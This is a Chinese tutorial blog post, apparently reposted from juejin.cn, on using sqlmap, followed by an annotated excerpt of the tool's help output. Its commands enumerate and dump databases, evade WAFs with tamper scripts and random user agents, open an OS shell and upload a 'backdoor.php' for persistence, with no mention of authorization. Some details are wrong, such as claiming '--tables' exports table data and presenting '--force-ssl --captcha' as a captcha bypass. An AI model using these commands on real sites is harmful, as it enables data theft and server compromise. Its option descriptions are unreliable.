likes
comments
collection
share

sqlmap入门操作Sqlmap基础使用 简单扫描URL SQLMap可以通过一个URL来检测SQL注入漏洞 在这个命令

作者站长头像
站长
· 阅读数 70

Sqlmap基础使用

简单扫描URL

SQLMap可以通过一个URL来检测SQL注入漏洞

sqlmap -u "http://example.com/page?id=1"

在这个命令中:

  • -u用于指定目标URL
  • http://example.com/page?id=1是目标测试的URL,URL中的参数(例如id = 1)是潜在的注入点。
自动化测试

检测并利用SQL注入

让 SQLMap 自动检测和利用漏洞:

sqlmap -u "http://example.com/page?id=1" --dbs --batch

  • --dbs命令让SQLMap尝试列出目标系统中的数据库
  • --batch 选项可以避免交互式提示,适用于自动化测试。
深度攻击与数据提取

1.1列出数据库中的表

在确定一个数据库后,使用以下命令列出其中的表:

sqlmap -u "http://example.com/page?id=1" -D database_name --tables

在这个命令中:

  • -D参数指定数据库名称。
  • --tables参数用于导出该表中的所有数据。

1.2获取表中的列

选择目标表后,列出表中的列:

sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns

1.3导出敏感数据 ​ 获取指定列中的数据:

sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name -C column_name --dump

  • -C 参数指定要导出的列,--dump 导出这些列中的所有数据。
使用 POST 请求

如果目标网站使用的是 POST 请求来传递参数,你可以用 SQLMap 进行测试。假设 POST 数据为 id=1&name=test

sqlmap -u "http://example.com/page" --data="id=1&name=test"
绕过 WAF (Web Application Firewall)

有些网站可能使用 WAF 来保护自己不被 SQL 注入攻击。SQLMap 提供了绕过 WAF 的选项:

sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
  • 这里 --tamper 选项使用了一个脚本(如 space2comment)来混淆 SQL 语句,使其更难被检测到。
  • space2comment 将 SQL 语句中的空格替换为注释符,从而绕过简单的模式匹配规则。
随机化 User-Agent 和 Referer

通过随机化 User-Agent 和 Referer,可以减小被 WAF 识别为攻击的可能性:

sqlmap -u "http://example.com/page?id=1" --random-agent --referer="http://google.com"
指定数据库类型

如果你知道目标数据库的类型(例如 MySQL、PostgreSQL),你可以用 --dbms 参数指定:

sqlmap -u "http://example.com/page?id=1" --dbms=mysql
绕过验证码、认证及复杂防护

1.1自动化提交验证码

对于要求输入验证码的页面,可以使用SQLMap的--force-ssl--captcha选项,自动化处理某些验证码。

sqlmap -u "https://example.com/page?id=1" --force-ssl --captcha

1.2使用已登录的会话

某些页面只有在登录后才能访问。在这种情况下,你需要使用现有的 Cookie 或会话信息:

sqlmap -u "http://example.com/page?id=1" --cookie="PHPSESSID=abcd1234"

1.3利用时间盲注和联合注入

如果目标应用屏蔽了标准的 SQL 注入,SQLMap 也可以使用盲注技术(如基于时间的盲注)进行攻击

sqlmap -u "http://example.com/page?id=1" --technique=T
  • --technique 选项指定了使用的注入技术(T=Time-based blind, U=Union query-based)。
高级攻击与持久化控制

1.1获得数据库的系统访问

在获取了管理员权限后,可以尝试直接获得操作系统的访问权限(例如通过 xp_cmdshell):

sqlmap -u "http://example.com/page?id=1" --os-shell

此命令将尝试在目标服务器上获取命令行访问权限。

1.2文件操作与持久化

SQLMap 还可以通过 SQL 注入在目标系统上上传文件,从而获得更持久的控制:

sqlmap -u "http://example.com/page?id=1" --file-write=/path/to/file --file-dest=/var/www/html/backdoor.php

Sqlmap --help


  Target:
    At least one of these options has to be provided to define the
    target(s) ##必须提供至少一个选项来定义目标

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
    ##将 Google dork 结果处理为目标 URL

  Request:
    ##这些选项可用于指定如何连接到目标 URL
    These options can be used to specify how to connect to the target URL
  
                        ##通过 POST 发送的数据字符串(例如“id=1”)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
                        
                        ##加入cookie值
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    
                        ##使用随机选择的 HTTP User-Agent 标头值
    --random-agent      Use randomly selected HTTP User-Agent header value
    
                        ##使用代理连接到目标 URL
    --proxy=PROXY       Use a proxy to connect to the target URL
    
                        ##使用洋葱浏览器
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    ##这些选项可用于自定义检测阶段
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    ##这些选项可用于调整特定SQL注入的测试技术
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
     ##这些选项可用于枚举后端数据库管理系统信息,结构和数据表
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables
          
    -a, --all           Retrieve everything  ##检索一切
    -b, --banner        Retrieve DBMS banner ##检索DBMS横幅
    --current-user      Retrieve DBMS current user  ##检索DBMS当前用户
    --current-db        Retrieve DBMS current database ##检索DBMS当前数据库
    --passwords         Enumerate DBMS users password hashes ##枚举DBMS用户密码哈希
    --dbs               Enumerate DBMS databases  ##枚举DBMS里的数据库
    --tables            Enumerate DBMS database tables ##枚举DBMS里的数据库的表
    --columns           Enumerate DBMS database table columns ##枚举DBMS里的数据库的表的列
    --schema            Enumerate DBMS schema ##列举DBMS模式
    --dump              Dump DBMS database table entries ##转储DBMS数据库表条目
    --dump-all          Dump all DBMS databases tables entries ##转换所有DBMS数据库表条目
    -D DB               DBMS database to enumerate ##DBMS数据库枚举
    -T TBL              DBMS database table(s) to enumerate ##要枚举的 DBMS 数据库表
    -C COL              DBMS database table column(s) to enumerate ##要枚举的 DBMS 数据库表列

  Operating system access:
    ##这些选项可用于访问后端数据库管理系统底层操作系统
    These options can be used to access the back-end database management
    system underlying operating system
        
    --os-shell          Prompt for an interactive operating system shell
                        ##提示交互式操作系统 shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
                        ##提示 OOB shell、Meterpreter 或 VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
                        ##永远不要求用户输入,使用默认行为
    --flush-session     Flush session files for current target
                        ##刷新当前目标的会话文件

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users
                        ##为初学者提供简单的向导界面

转载自:https://juejin.cn/post/7418504824856166436
评论
请登录